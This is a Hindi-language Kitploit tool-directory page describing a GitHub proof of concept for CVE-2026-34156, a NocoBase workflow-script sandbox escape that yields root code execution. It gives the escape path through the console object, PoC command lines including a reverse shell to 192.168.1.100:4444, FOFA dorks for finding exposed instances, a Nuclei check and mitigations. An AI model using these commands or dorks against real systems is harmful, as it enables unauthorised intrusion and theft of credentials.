Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-34156 — CVE-2026-34156 | Kitploit
उपकरण/GitHubGitHub/0xblackash/cve-2026-34156
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHub0xblackash/cve-2026-34156

CVE-2026-34156

CVE-2026-34156

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2026-34156 - NocoBase महत्वपूर्ण सैंडबॉक्स एस्केप

ChatGPT छवि 3 अप्रैल, 2026, 01:32:16 अपराह्न गंभीर CVSS 9.9 सार्वजनिक शोषण

अप्रमाणित / निम्न-विशेषाधिकार → रूट रिमोट कोड निष्पादन NocoBase में


📌 अवलोकन

CVE-2026-34156 NocoBase (एक ओपन-सोर्स नो-कोड/लो-कोड प्लेटफॉर्म) में एक महत्वपूर्ण सैंडबॉक्स एस्केप भेद्यता है।

एक हमलावर जो वर्कफ़्लो स्क्रिप्ट नोड बना या निष्पादित कर सकता है (कम विशेषाधिकारों के साथ भी), Node.js vm सैंडबॉक्स से बच सकता है और कंटेनर के अंदर रूट के रूप में पूर्ण रिमोट कोड निष्पादन प्राप्त कर सकता है।

प्रभावित संस्करण

  • NocoBase < 2.0.28

सुधारित

  • NocoBase 2.0.28 (मार्च 2026 में जारी)

🛠 भेद्यता विवरण

  • घटक: @nocobase/plugin-workflow-javascript (स्क्रिप्ट नोड)
  • प्रकार: console._stdout.constructor.constructor के माध्यम से सैंडबॉक्स एस्केप
  • प्रभाव:
    • रूट के रूप में रिमोट कोड निष्पादन (uid=0)
    • मनमाना कमांड निष्पादन
    • फ़ाइल सिस्टम तक पहुंच (fs)
    • पर्यावरण चर लीकेज (डेटाबेस क्रेडेंशियल, रहस्य)
    • पूर्ण कंटेनर समझौता

मूल कारण

सैंडबॉक्स में पारित console ऑब्जेक्ट होस्ट रियल्म से है, जो हमलावरों को प्रोटोटाइप श्रृंखला पर चढ़ने और वास्तविक Function कंस्ट्रक्टर → process.mainModule.require तक पहुंचने की अनुमति देता है।


🚀 शोषण

प्रूफ ऑफ कॉन्सेप्ट (PoC)

root@kitploit:~
# Simple command execution
python3 CVE-2026-34156.py -u https://target.com -e [email protected] -p password -c "id"

# Reverse shell
python3 CVE-2026-34156.py -u https://target.com -r 192.168.1.100:4444

रिपॉजिटरी में शामिल: पूर्ण PoC स्क्रिप्ट, Nuclei टेम्पलेट, और सुरक्षित जांचकर्ता।


🧪 पता लगाना

Nuclei टेम्पलेट

root@kitploit:~
nuclei -u https://target -t cves/CVE-2026-34156.yaml

FOFA डॉर्क

root@kitploit:~
title="NocoBase" || title="Sign in - NocoBase"
title="NocoBase" && body="workflow"

🛡️ शमन

  1. तुरंत NocoBase 2.0.28 या नए संस्करण में अपग्रेड करें।
  2. अविश्वसनीय उपयोगकर्ताओं के लिए वर्कफ़्लो स्क्रिप्ट नोड अक्षम करें।
  3. NocoBase कंटेनर को गैर-रूट उपयोगकर्ता के रूप में चलाएं।
  4. उत्पादन में मजबूत सैंडबॉक्सिंग (जैसे, isolated-vm) का उपयोग करें।

📸 स्क्रीनशॉट

cve-2026-34156

⚠️ कानूनी अस्वीकरण

यह रिपॉजिटरी केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए है।
केवल उन सिस्टमों पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।

अनधिकृत शोषण अवैध है।


⭐ श्रेय और संदर्भ

  • खोज: अज्ञात (सार्वजनिक रूप से प्रकट)
  • पैच: NocoBase सुरक्षा टीम
  • NVD: CVE-2026-34156
  • GitHub सलाह: GHSA-px3p-vgh9-m57c

सुरक्षा समुदाय के लिए ❤️ के साथ बनाया गया
सुरक्षित रहें। तेजी से पैच करें।

टूल डाउनलोड करें